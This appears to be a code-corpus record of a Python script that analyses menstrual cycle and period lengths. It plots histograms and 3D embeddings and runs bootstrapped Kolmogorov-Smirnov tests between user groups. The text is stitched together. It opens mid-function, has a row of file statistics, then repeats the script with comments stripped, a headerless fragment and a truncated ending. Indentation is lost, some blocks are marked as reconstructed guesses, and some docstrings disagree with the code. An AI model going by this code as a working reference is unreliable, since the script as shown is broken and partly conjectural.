counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
max_period_days=28
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Bootstrapped-KS for cycle and period length
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
'''
Function that computes cycle and period length Kolmogorov-Smirnov tests between group distributions, based on bootstrapping
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about user's cycle
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
n_bootstrapping: Number of bootstrapped samples to use for the analysis
save_dir: path where to save plot
Output:
None
'''
# True separation of users into groups
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
########### TRUE OBSERVERD STATISTICS ##########
# Cycles per-group
true_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_greater_than_cutoff)]
true_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_less_than_cutoff)]
# KS cycle_length
true_KS_cycle_length, true_p_val_cycle_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['cycle_length'].dropna(), true_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
true_KS_period_length, true_p_val_period_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
########### BOOTSTRAP BASED STATISTICS ##########
# Computed suff statistics
bootstrapped_KS_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_KS_period_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_period_length=np.zeros(n_bootstrapping)
for n_bootstrap in np.arange(n_bootstrapping):
#print('Sample={}/{}'.format(n_bootstrap,n_bootstrapping))
        # Bootstrapped sample indicators: resample each group, with replacement, to its original size
        bootstrapped_users_greater_than_cutoff=np.random.choice(true_users_greater_than_cutoff,n_users_greater_than_cutoff)
        bootstrapped_users_less_than_cutoff=np.random.choice(true_users_less_than_cutoff,n_users_less_than_cutoff)
# Cycles per-group
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
# KS cycle_length
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
# Print bootstrap results
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
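# Illustrative sketch (added; not part of the original analysis): the KS routine
# above only needs a per-user stats frame carrying 'user_id' plus the cutoff
# column, and a per-cycle frame carrying 'user_id', 'cycle_length' and
# 'period_length'. With hypothetical toy data it could be exercised as:
#
#   toy_stats = pd.DataFrame({'user_id': [1, 2], 'median_inter_cycle_length': [12, 3]})
#   toy_cycles = pd.DataFrame({'user_id': [1, 1, 2, 2],
#                              'cycle_length': [45, 30, 28, 29],
#                              'period_length': [6, 5, 4, 4]})
#   bootstrapped_cycle_period_lengths_KS(
#       toy_stats, toy_cycles, 'median_inter_cycle_length', 9, 100, '.')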
# Average statistics over cycle-id
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots cycle and period length average and standard deviation across user's timeline (i.e., by cycle-id) across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
# Plotting
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Plot for max intercycle length (i.e., CLD) histogram
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
'''
Function that plots max inter cycle length (max CLD) histograms with and without excluded cycles
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
cycle_stats_exclude_flagged: pandas dataframe with users' cycle statistics after removing cycles flagged for exclusion
save_dir: path where to save plot
Output:
None
'''
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
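# Hedged usage sketch (illustration only, synthetic numbers; the _demo_* helper is
# not part of the original script): overlays the max-CLD histogram of a full cohort
# against a cleaned subset, matching the two-dataframe signature above.
def _demo_plot_max_intercycle_length_hists():
    all_stats = pd.DataFrame({'max_inter_cycle_length': [3, 5, 9, 20, 40]})
    clean_stats = pd.DataFrame({'max_inter_cycle_length': [3, 5, 9]})
    plot_max_intercycle_length_hists(all_stats, clean_stats, '.')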
# Plot for median Vs max intercycle length (i.e., CLD) histogram
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
'''
Function that plots median Vs max inter cycle length (CLD) 2D scatter histogram
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
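# Hedged usage sketch (illustration only, synthetic numbers; added helper): the 2D
# histogram above only needs the two CLD columns of the stats frame.
def _demo_plot_median_vs_max_intercycle_length():
    demo_stats = pd.DataFrame({'median_inter_cycle_length': [2, 3, 5, 8],
                               'max_inter_cycle_length': [4, 9, 20, 30]})
    plot_median_vs_max_intercycle_length(demo_stats, '.')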
# Plot for median intercycle length (i.e., CLD) histogram
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
'''
Function that plots median CLD histograms
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Median CLD histogram
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Actual plot
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel(y_label)
plt.grid(True)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
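# Hedged usage sketch (illustration only, synthetic numbers; added helper): a
# median-CLD CDF from a handful of users.
def _demo_plot_median_CLD_hist():
    demo_stats = pd.DataFrame({'median_inter_cycle_length': [2., 3., 3., 5., 8., 13.]})
    plot_median_CLD_hist(demo_stats, 'cdf', '.')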
################################## MAIN ############################
def main():
'''
Main function of the script that runs the cycle and period length related analysis
Input:
None
Output:
None
'''
### Directories
data_dir='../data'
preprocessed_data_dir='../preprocessed_data'
results_dir = '../results/characterizing_cycle_and_symptoms/cycle_period_length_analysis'
os.makedirs(results_dir, exist_ok = True)
################# SYMPTOMS TRACKED #################
# Tracking
with open('{}/tracking_enriched.pickle'.format(data_dir), 'rb') as f:
tracking = pickle.load(f)
print('Tracking-data loaded')
################# CYCLES #################
with open('{}/cohort_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycle_stats = pickle.load(f)
# Cycles flagged
with open('{}/cohort_cycles_flagged.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycles_flagged = pickle.load(f)
# Exclude cycles flagged as badly tracked
cohort_cycles = cohort_cycles_flagged[cohort_cycles_flagged['badly_tracked_cycle'] == 'f']
# Cycles stats
with open('{}/cohort_clean_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_clean_cycle_stats = pickle.load(f)
print('Cycles-data loaded')
################# PLOTTING #################
#### PLOT histogram of max intercycle length, with and without excluding flagged cycles
plot_max_intercycle_length_hists(cohort_cycle_stats, cohort_clean_cycle_stats, results_dir)
#### PLOT Median Vs Max CLD 2D histogram
plot_median_vs_max_intercycle_length(cohort_clean_cycle_stats, results_dir)
#### PLOT Median CLD histogram
plot_median_CLD_hist(cohort_clean_cycle_stats, 'cdf', results_dir)
#### PLOT cycle and period length histograms: pdf
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
#### Bootstrapped-KS cycle and period length
bootstrapped_cycle_period_lengths_KS(cohort_clean_cycle_stats, cohort_cycles, 'median_inter_cycle_length', 9, 100000, results_dir)
#### PLOT average cycle and average length over cycle-id
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, results_dir)
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, results_dir)
#### PLOT random cycle length time-series
random_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, results_dir)
#### PLOT population level cycle and period length time-series
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'period_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
# Making sure the main program is not executed when the module is imported
if __name__ == '__main__':
# Just run the main
main()
| 55.325733
| 257
| 0.68222
|
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
import numpy as np
import scipy.stats as stats
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
max_period_days=28
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
    true_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_greater_than_cutoff)]
    true_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_less_than_cutoff)]
    true_KS_cycle_length, true_p_val_cycle_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['cycle_length'].dropna(), true_cycles_users_less_than_cutoff['cycle_length'].dropna())
    true_KS_period_length, true_p_val_period_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
    # NOTE: the resampling block below is reconstructed from the surrounding code
    # (the source lines were truncated); resampling users with replacement at the
    # true group sizes is an assumption.
    bootstrapped_KS_cycle_length = np.zeros(n_bootstrapping)
    bootstrapped_p_val_cycle_length = np.zeros(n_bootstrapping)
    bootstrapped_KS_period_length = np.zeros(n_bootstrapping)
    bootstrapped_p_val_period_length = np.zeros(n_bootstrapping)
    for n_bootstrap in np.arange(n_bootstrapping):
        bootstrapped_users_greater_than_cutoff = np.random.choice(true_users_greater_than_cutoff, n_users_greater_than_cutoff)
        bootstrapped_users_less_than_cutoff = np.random.choice(true_users_less_than_cutoff, n_users_less_than_cutoff)
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
